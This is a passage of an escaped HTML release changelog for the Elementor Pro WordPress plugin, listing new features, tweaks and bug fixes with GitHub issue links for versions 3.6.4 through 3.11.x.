Rules" in popup publish settings (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17020\\\">#17020<\\/a>)<\\/li>\\n<li>Fix: Dynamic background image and video is not working with ACF in Loop Grid widget<\\/li>\\n<\\/ul>\\n<h4>3.11.7 - 2023-03-22<\\/h4>\\n<ul>\\n<li>Tweak: Improved code security enforcement in WooCommerce components<\\/li>\\n<\\/ul>\\n<h4>3.11.6 - 2023-03-14<\\/h4>\\n<ul>\\n<li>Tweak: Improved code security enforcement in Author Box and Countdown widgets<\\/li>\\n<\\/ul>\\n<h4>3.11.5 - 2023-03-12<\\/h4>\\n<ul>\\n<li>Fix: Hamburger Menu Toggle not showing if breakpoint is set to Tablet Extra in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21003\\\">#21003<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.11.4 - 2023-03-07<\\/h4>\\n<ul>\\n<li>Tweak: Prevented SVG file upload for better security enforcement in Forms widget<\\/li>\\n<\\/ul>\\n<h4>3.11.3 - 2023-02-26<\\/h4>\\n<ul>\\n<li>Fix: Error message appears when submitting a form placed below Loop Grid and Loop Carousel widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21432\\\">#21432<\\/a>)<\\/li>\\n<li>Fix: PHP 8.x compatibility issues in various places<\\/li>\\n<\\/ul>\\n<h4>3.11.2 - 2023-02-22<\\/h4>\\n<ul>\\n<li>Fix: Save & Back handle becomes inaccessible in various scenarios cases in Loop Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21316\\\">#21316<\\/a>)<\\/li>\\n<li>Fix: Can\'t edit page when using \'Content Tabs\' and \'Section\' options in Video Playlist widget<\\/li>\\n<\\/ul>\\n<h4>3.11.1 - 2023-02-15<\\/h4>\\n<ul>\\n<li>Fix: Featured Image dynamic tag is not working in Background images (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21313\\\">#21313<\\/a>)<\\/li>\\n<li>Fix: Time zone is not correct in Countdown widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17485\\\">#17485<\\/a>)<\\/li>\\n<li>Fix: File upload field is not working in Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21341\\\">#21341<\\/a>)<\\/li>\\n<li>Fix: Post Image Attachments dynamic tag is not working in various widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21314\\\">#21314<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.11.0 - 2023-02-13<\\/h4>\\n<ul>\\n<li>New: Introducing Loop Carousel widget - Create powerful & repeating loop templates and populate each one with dynamic content (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/219\\\">#219<\\/a>)<\\/li>\\n<li>New: Added Date and Time Range option to Advanced Rules in Popup<\\/li>\\n<li>Tweak: Improved accessibility when opening and closing a popup (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9788\\\">#9788<\\/a>)<\\/li>\\n<li>Tweak: Improved accessibility of full-screen mode in Search Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19907\\\">#19907<\\/a>)<\\/li>\\n<li>Tweak: Added keyboard accessibility support to Flip Box widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5861\\\">#5861<\\/a>)<\\/li>\\n<li>Tweak: Add <code>aria-label<\\/code> to read more link in Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13784\\\">#13784<\\/a>)<\\/li>\\n<li>Tweak: Use <code>aspect-ratio<\\/code> property instead of CSS trick in Media Carousel widget<\\/li>\\n<li>Tweak: Updated translation string in Stripe widget<\\/li>\\n<li>Fix: Masonry and Columns controls are not working as expected with responsive in Posts and Loop Grid widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20670\\\">#20670<\\/a>)<\\/li>\\n<li>Fix: Invalid attributes names in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17400\\\">#17400<\\/a>)<\\/li>\\n<li>Fix: Post Image Attachments dynamic tag is not working as expected in various widgets<\\/li>\\n<li>Fix: Form fields order is not presented correctly when exported to CSV in Form Submissions<\\/li>\\n<li>Fix: Dynamic background image and video are not working with ACF in Loop Grid widget<\\/li>\\n<\\/ul>\\n<h4>3.10.3 - 2023-01-29<\\/h4>\\n<ul>\\n<li>Tweak: Added introduction video to loop item information modal in Theme Builder<\\/li>\\n<li>Fix: PHP 8.x throws errors and notices in some cases (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21087\\\">#21087<\\/a>)<\\/li>\\n<li>Fix: Infinite Scroll and Load on click pagination are not working as expected in Archive template<\\/li>\\n<li>Fix: Show row even when values do not exist in Form Submissions<\\/li>\\n<\\/ul>\\n<h4>3.10.2 - 2023-01-17<\\/h4>\\n<ul>\\n<li>Fix: Updated compatibility tag for Elementor v3.10<\\/li>\\n<\\/ul>\\n<h4>3.10.1 - 2023-01-09<\\/h4>\\n<p>Fix: Preview Could not be loaded error message appears on pages containing the Loop Grid in a header or footer templates<\\/p>\\n<h4>3.10.0 - 2023-01-09<\\/h4>\\n<ul>\\n<li>New: Added new dynamic tag for due date in Countdown widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7737\\\">#7737<\\/a>)<\\/li>\\n<li>Tweak: Added <code>modified<\\/code> and <code>comment_count<\\/code> to Order By in posts query control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11159\\\">#11159<\\/a>)<\\/li>\\n<li>Tweak: Replaced <code>footer<\\/code> tag in Blockquote and Comments widgets for better semantics<\\/li>\\n<li>Fix: Compatibility issue in Imagify Media Library filters due to <code>_elementor_is_screenshot<\\/code> meta filter (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19988\\\">#19988<\\/a>)<\\/li>\\n<li>Fix: Hotspot Widget label icon height issues when Inline Font Icons experiment is active<\\/li>\\n<li>Fix: Editing glitch when using two loop grid widgets on the same page with the same loop item template<\\/li>\\n<li>Fix: Equal height is not working when using sections in Loop Grid widget<\\/li>\\n<li>Fix: Large amount of menu items are not appearing correctly on a mobile device in Nav Menu widget<\\/li>\\n<li>Fix: Featured Image does not change dynamically when using infinite\\/click pagination in Loop Grid widget<\\/li>\\n<li>Fix: Removed action call of non-existent <code>display_empty_cart_template()<\\/code> method in Cart widget<\\/li>\\n<\\/ul>\\n<h4>3.9.2 - 2022-12-21<\\/h4>\\n<ul>\\n<li>Fix: JS events do not trigger in Popups (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20708\\\">#20708<\\/a>)<\\/li>\\n<li>Fix: PHP Errors appear when not using the toggle menu in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18636\\\">#18636<\\/a>)<\\/li>\\n<li>Fix: Popups\' backgrounds disappear when using Lazy Load Background Images experiment<\\/li>\\n<\\/ul>\\n<h4>3.9.1 - 2022-12-14<\\/h4>\\n<ul>\\n<li>Fix: WooCommerce Product Gallery dynamic tag is not working in Basic Gallery, Gallery and Image Carousel widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20678\\\">#20678<\\/a>)<\\/li>\\n<li>Fix: Hide Empty option is not working in Menu Cart widget<\\/li>\\n<li>Fix: The Stripe Button widget doesn\'t work in Templates<\\/li>\\n<\\/ul>\\n<h4>3.9.0 - 2022-12-06<\\/h4>\\n<ul>\\n<li>New: Added support for WooCommerce to Loop Builder (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20020\\\">#20020<\\/a>)<\\/li>\\n<li>Tweak: Added more options to \'Show up to X times\' advanced rule in Popups (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8187\\\">#8187<\\/a>)<\\/li>\\n<li>Tweak: Allow saving and reloading a page while editing in-place loop item template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19882\\\">#19882<\\/a>)<\\/li>\\n<li>Tweak: Added <code>$location param<\\/code> to <code>elementor\\/theme\\/get_location_templates\\/template_id<\\/code> hook (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18453\\\">#18453<\\/a>)<\\/li>\\n<li>Tweak: Removed redundant labels from group controls (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11666\\\">#11666<\\/a>)<\\/li>\\n<li>Tweak: Added support to use sections and columns as the layout structure of a Loop item template<\\/li>\\n<li>Tweak: Disabled movement when a repeater item is in focus in edit mode<\\/li>\\n<li>Tweak: Upgrade the autoprefixer package to better minify CSS files<\\/li>\\n<li>Tweak: Removed duplicate SQL queries on every page for better performance<\\/li>\\n<li>Tweak: Improved License validation mechanism to avoid limitations<\\/li>\\n<li>Tweak: Added more units options to Border Width control in various elements<\\/li>\\n<li>Tweak: Added <code>em<\\/code> units to Border Radius control in various elements<\\/li>\\n<li>Tweak: Added \'Equal height\' functionality to Loop Grid widget<\\/li>\\n<li>Fix: Issue with Related Products widget and WooCommerce Pixel Manager plugin (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16934\\\">#16934<\\/a>)<\\/li>\\n<li>Fix: My Account widget gets hidden when using a single page template with post content (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19627\\\">#19627<\\/a>)<\\/li>\\n<li>Fix: Cart is not updated when cache enabled in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19312\\\">#19312<\\/a>)<\\/li>\\n<li>Fix: Entrance animations are not working as expected with Infinite Loop and Load on CLick pagination in Loop Grid widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20293\\\">#20293<\\/a>)<\\/li>\\n<li>Fix: Loading page issues in Form Submissions screen (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19973\\\">#19973<\\/a>)<\\/li>\\n<li>Fix: Recently Edited date and time not working as expected in Elementor Overview plugin in WordPress dashboard (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17966\\\">#17966<\\/a>)<\\/li>\\n<li>Fix: Recurring license mismatch error message when using translators plugins<\\/li>\\n<li>Fix: Submenu items triggers page transition instead of opening in Nav Menu widget<\\/li>\\n<li>Fix: Query values of Posts widget are not imported correctly when importing a Kit<\\/li>\\n<li>Fix: Loop items are exceeding the widget boundaries in Loop Grid widget<\\/li>\\n<li>Fix: Order by option is not working as expected when choosing Upsells, Cross-Sells and Related Products query in Products widget<\\/li>\\n<li>Fix: Various widgets disappear in certain scenarios when choosing direction Row or Column in Container<\\/li>\\n<\\/ul>\\n<h4>3.8.2 - 2022-11-20<\\/h4>\\n<ul>\\n<li>Fix: Z-index issues when applying sticky to Container<\\/li>\\n<li>Fix: Error message appears on front with Editor and Shop Manager roles when using the Loop Builder widget<\\/li>\\n<\\/ul>\\n<h4>3.8.1 - 2022-11-06<\\/h4>\\n<ul>\\n<li>Fix: Sticky inner section is not staying in the column when applying sticky option in Sections (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20203\\\">#20203<\\/a>)<\\/li>\\n<li>Fix: Post Title widget located in a loop item template disappears when enabling the hide title option inside page settings (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20207\\\">#20207<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20255\\\">#20255<\\/a>)<\\/li>\\n<li>Fix: ACF Dynamic data not rendering correctly in various scenarios (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20235\\\">#20235<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20258\\\">#20258<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20277\\\">#20277<\\/a>)<\\/li>\\n<li>Fix: Z-index issues when applying sticky to Container (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20227\\\">#20227<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.8.0 - 2022-10-30<\\/h4>\\n<ul>\\n<li>New: Introducing Loop Builder as a beta status experiment - Create powerful & repeating loop templates and populate each one with dynamic content and design flexibility (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4440\\\">#4440<\\/a>)<\\/li>\\n<li>Tweak: Add <code>wp_body_open()<\\/code> to header in Header template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11562\\\">#11562<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15828\\\">#15828<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13089\\\">#13089<\\/a>)<\\/li>\\n<li>Tweak: Added support border-radius option to the Code Highlight widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14316\\\">#14316<\\/a>)<\\/li>\\n<li>Tweak: Import\\/Export CLI and UI mechanisms were merged into a unified service<\\/li>\\n<li>Tweak: User with no permission to Notes cannot be mentioned in a note<\\/li>\\n<li>Tweak: User with no permission to view a post cannot be mentioned in a note<\\/li>\\n<li>Tweak: Notes was added to the right click context-menu<\\/li>\\n<li>Tweak: Notes panel can be resizable<\\/li>\\n<li>Tweak: Notes panel can be dragged outside of the canvas in responsive mode in the editor<\\/li>\\n<li>Tweak: Updated form validation messages translation strings in Form widget<\\/li>\\n<li>Tweak: Updated translators comments<\\/li>\\n<li>Tweak: Theme Builder logo and Title should be clickable<\\/li>\\n<li>Tweak: Reduced API requests and DB calls on non-write setup<\\/li>\\n<li>Tweak: Added media queries to the Table of Contents widget<\\/li>\\n<li>Fix: Sticky option is not working as expected in various scenarios in Container (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18357\\\">#18357<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19540\\\">#19540<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19618\\\">#19618<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19777\\\">#19777<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19827\\\">#19827<\\/a>)<\\/li>\\n<li>Fix: Mixed Content errors on HTTPS in Video Playlist Widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18895\\\">#18895<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18945\\\">#18945<\\/a>)<\\/li>\\n<li>Fix: Note\'s timestamp is being updated according to the last activity in Notes (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19123\\\">#19123<\\/a>)<\\/li>\\n<li>Fix: Accessibility attribute <code>role=navigation<\\/code> is redundant in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17582\\\">#17582<\\/a>)<\\/li>\\n<li>Fix: Accessibility attribute <code>role=navigation<\\/code> is redundant in pagination in Posts widget<\\/li>\\n<li>Fix: Share buttons is accessible with keyboard but not clickable<\\/li>\\n<li>Fix: Sub-items icons style is missing in preview with Inline Font Icons experiment in Nav Menu widget<\\/li>\\n<li>Fix: Quotes are appearing as HTML when editing a note in Notes<\\/li>\\n<li>Fix: Label\'s Icon height increases when Inline Font Icons experiment is active in Hotspot Widget<\\/li>\\n<li>Fix: Sub conditions of templates are not overridden when importing a Kit<\\/li>\\n<li>Fix: X\\/Y Anchor Point controls were not visible for Scale and Rotate effects<\\/li>\\n<li>Fix: PHP warning notice appears in some situations when using motion effects<\\/li>\\n<\\/ul>\\n<h4>3.7.7 - 2022-09-20<\\/h4>\\n<ul>\\n<li>Fix: Default Flex Grow affects the layout when the container is set to direction Column in various widgets<\\/li>\\n<\\/ul>\\n<h4>3.7.6 - 2022-09-14<\\/h4>\\n<ul>\\n<li>Fix: Submissions menu item appears at the bottom of Elementor section in WordPress dashboard<\\/li>\\n<\\/ul>\\n<h4>3.7.5 - 2022-08-31<\\/h4>\\n<ul>\\n<li>Fix: Error message appears on front if WooCommerce is activated (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19553\\\">#19553<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.7.4 - 2022-08-29<\\/h4>\\n<ul>\\n<li>Tweak: PHP 5.6 Is deprecated<\\/li>\\n<li>Fix: Triangle icon is not being displayed in the Select field when Inline Font Icons Experiment is active in Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18598\\\">#18598<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19495\\\">#19495<\\/a>)<\\/li>\\n<li>Fix: The page jumps or flickers to the video playlist on page reload in Video Playlist Widget<\\/li>\\n<\\/ul>\\n<h4>3.7.3 - 2022-07-31<\\/h4>\\n<ul>\\n<li>Tweak: Improved license mechanism for correct validation<\\/li>\\n<li>Fix: Sticky option causes unexpected results when using the Container (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18357\\\">#18357<\\/a>)<\\/li>\\n<li>Fix: Price list, Portfolio, Flip Box and Gallery widgets disappear when the direction is set to column in Container (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18880\\\">#18880<\\/a>)<\\/li>\\n<li>Fix: Quotes character is showing up as <code>&quot;<\\/code> when editing a note in Notes<\\/li>\\n<\\/ul>\\n<h4>3.7.2 - 2022-06-15<\\/h4>\\n<ul>\\n<li>Tweak: Applied optimized file handling in various modules<\\/li>\\n<li>Fix: Related posts query options are missing in Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18633\\\">#18633<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18641\\\">#18641<\\/a>)<\\/li>\\n<li>Fix: Menu Cart Icon is not being displayed on all browsers when Inline Font Icons Experiment is active (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17705\\\">#17705<\\/a>)<\\/li>\\n<li>Fix: Gallery widget is not working as expected in Container element (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18408\\\">#18408<\\/a>)<\\/li>\\n<li>Fix: Flip box is not visible when the direction is set to Row in Container element (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18413\\\">#18413<\\/a>)<\\/li>\\n<li>Fix: Portfolio widget is not visible when dragged into "Row" direction Container element (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17653\\\">#17653<\\/a>)<\\/li>\\n<li>Fix: Menu cart is open automatically in Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18629\\\">#18629<\\/a>)<\\/li>\\n<li>Fix: PHP error is being shown the license is expired in License screen<\\/li>\\n<\\/ul>\\n<h4>3.7.1 - 2022-05-16<\\/h4>\\n<ul>\\n<li>Fix: Notes icon appears as an empty square in admin top bar for users with permissions lower than Editor<\\/li>\\n<li>Fix: Notes experiment causes a PHP fatal error on some cases<\\/li>\\n<li>Fix: UI glitches in Notes feature<\\/li>\\n<\\/ul>\\n<h4>3.7.0 - 2022-05-10<\\/h4>\\n<ul>\\n<li>New: Introducing Notes - Work collaboratively directly within Elementor<\\/li>\\n<li>New: Stripe Button widget - Collect Stripe payments directly from your site (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14748\\\">#14748<\\/a>)<\\/li>\\n<li>New: Meet WooCommerce Add to Cart dynamic tag - add products to cart from every widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10607\\\">#10607<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11801\\\">#11801<\\/a>)<\\/li>\\n<li>New: Added WooCommerce Product Content dynamic tag (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16367\\\">#16367<\\/a>)<\\/li>\\n<li>Tweak: Added Related, Upsells and Cross-Sells query sources to Products widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8071\\\">#8071<\\/a>)<\\/li>\\n<li>Tweak: Added custom icon control to Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18007\\\">#18007<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14357\\\">#14357<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13151\\\">#13151<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11361\\\">#11361<\\/a>)<\\/li>\\n<li>Tweak: Added an option to minimize on Desktop device in Table of Contents widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9933\\\">#9933<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic tag controls to Share Buttons widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10729\\\">#10729<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic tag controls to Media Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10314\\\">#10314<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic tag controls to Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6327\\\">#6327<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6691\\\">#6691<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11774\\\">#11774<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9051\\\">#9051<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic tag controls to Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6327\\\">#6327<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic tag controls to Slides widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5760\\\">#5760<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9774\\\">#9774<\\/a>)<\\/li>\\n<li>Tweak: Added align button to bottom option in various Product widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10263\\\">#10263<\\/a>)<\\/li>\\n<li>Tweak: Added align button to bottom control in Posts and Archive Posts widgets<\\/li>\\n<li>Tweak: Added the ability to hide and show the coupon section in WooCommerce Cart widget<\\/li>\\n<li>Tweak: Added the ability to hide and show the coupon section in WooCommerce Checkout widget<\\/li>\\n<li>Tweak: Added alignment option to various buttons in WooCommerce Cart widget<\\/li>\\n<li>Tweak: Added alignment option to various buttons in WooCommerce Checkout widget<\\/li>\\n<li>Tweak: Added percentage unit to padding control in Additional Information customize section in WooCommerce Checkout widget<\\/li>\\n<li>Tweak: Added quick link to create new theme parts directly from the Finder<\\/li>\\n<li>Tweak: Added the option to add a custom template to Dashboard screen in My Account widget<\\/li>\\n<li>Tweak: Added spacing control to view cart button in various product widgets<\\/li>\\n<li>Tweak: Added the option to add a custom template to empty cart state in Cart widget<\\/li>\\n<li>Tweak: Adjusted the layout of the Payment Methods screen in the My Account widget<\\/li>\\n<li>Tweak: Added lazy load option to Media Carousel, Reviews and Testimonial Carousel widgets<\\/li>\\n<li>Tweak: Added Site Identity quick link to Logo widget<\\/li>\\n<li>Tweak: Added Site Identity quick link to Site Title widget<\\/li>\\n<li>Tweak: Created an attribute that allows disabling page transition for specific links<\\/li>\\n<li>Tweak: Added dynamic tag controls to Gallery widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Countdown widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Portfolio widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Price Table widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Login widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Blockquote widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Facebook Comments widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Post Navigation widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Search Form widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Author Box widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Post info widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Archive Posts widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Product Meta widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Archive Products widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Sitemap widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Reviews widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Code Highlight widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to PayPal Button widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to WooCommerce Checkout widget<\\/li>\\n<li>Tweak: Added missing PHP documentation to hooks<\\/li>\\n<li>Fix: Scrolling glitches on mobile devices when Sticky Effect is enabled (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17767\\\">#17767<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18330\\\">#18330<\\/a>)<\\/li>\\n<li>Fix: Only 1st honypot field is validated when using multiple honeypot fields in Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18136\\\">#18136<\\/a>)<\\/li>\\n<li>Fix: Checkout button background color is not working as expected in Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18289\\\">#18289<\\/a>)<\\/li>\\n<li>Fix: Button labels are not accessible for screen readers in Share buttons widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8615\\\">#8615<\\/a>)<\\/li>\\n<li>Fix: Downloads titles controls are not working in responsive in WooCommerce Purchase Summary widget<\\/li>\\n<li>Fix: Excerpt length is not working as expected in Posts and Archive Posts widgets<\\/li>\\n<li>Fix: Titles & Totals weight is not working in WooCommerce Checkout widget<\\/li>\\n<li>Fix: Product image is not appearing on Single Product Page on template load<\\/li>\\n<li>Fix: Additional Information title not editable in some scenarios in WooCommerce Checkout widget<\\/li>\\n<li>Fix: Cart is not updating automatically on mobile in Cart widget<\\/li>\\n<li>Fix: UI Glitch in Masonry control in Portfolio widget<\\/li>\\n<li>Fix: Custom breakpoints experiment didn\'t work on Single post and page templates<\\/li>\\n<li>Fix: Testimonial carousel & Reviews widgets disregards the <code>alt<\\/code> attribute<\\/li>\\n<li>Fix: Playlist widget deeplink didn\'t send user directly to the widget in the page<\\/li>\\n<li>Fix: Masonry option causes the images to disappear in the Editor in Posts widget<\\/li>\\n<li>Fix: Scrollbar appears after clicking on the dropdown toggle in Nav Menu widget<\\/li>\\n<li>Fix: Custom icons disappear on frontend if the pack name contains numbers<\\/li>\\n<li>Fix: Custom Font disappears if the name contains only numbers<\\/li>\\n<li>Fix: <code>end-section()<\\/code> is missing from Progress Tracker and Facebook Embed widgets<\\/li>\\n<li>Tweak: Added a filter for conditions cache query in Theme Builder<\\/li>\\n<li>Fix: Customizations lost on Ajax refresh in WooCommerce Cart widget<\\/li>\\n<li>Fix: Hello theme Header and Footer experiment is not working when WooCommerce plugin is active<\\/li>\\n<li>Fix: Color controls are not working as expected in Checkout widget<\\/li>\\n<li>Fix: Color controls are not working as expected in My Account widget<\\/li>\\n<li>Fix: Empty state widget preview in the editor is disappearing in various widgets<\\/li>\\n<li>Fix: Cart is not updating automatically on mobile in WooCommerce Cart widget<\\/li>\\n<li>Deprecated: See all deprecations to this version in our <a href=\\\"https:\\/\\/developers.elementor.com\\/v3-7-planned-deprecations\\/\\\">Developers Deprecations Post<\\/a><\\/li>\\n<\\/ul>\\n<h4>3.6.5 - 2022-04-12<\\/h4>\\n<ul>\\n<li>Fix: Compatibility issues for several widgets in iOS 14 and macOS 13 devices (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18090\\\">#18090<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15910\\\">#15910<\\/a>)<\\/li>\\n<li>Fix: Button Alignment doesn\'t work in Custom Add To Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17810\\\">#17810<\\/a>)<\\/li>\\n<li>Fix: PHP warning is thrown in some cases in PayPal button widget<\\/li>\\n<li>Fix: PHP 8.1 throws errors and notices in some cases<\\/li>\\n<li>Fix: PHP notice was thrown when Kit Import process initiated without display conditions<\\/li>\\n<li>Fix: Create Account button always opens on the Sign Up screen even if the user has an account in Onboarding process<\\/li>\\n<\\/ul>\\n<h4>3.6.4 - 2022-03-15<\\/h4>\\n<ul>\\n<li>Tweak: Kit import dynamic reference support for templates and dynamic tags<\\/li>\\n<li>Tweak: Updated tested up to version tag to <code>3.6.0<\\/code><\\/li>\\n<li>Fix: Sticky caused scrolling issues after clicking an element that expands the page height (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17821\\\">#17821<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17839\\\">#17839<\\/a>, <a 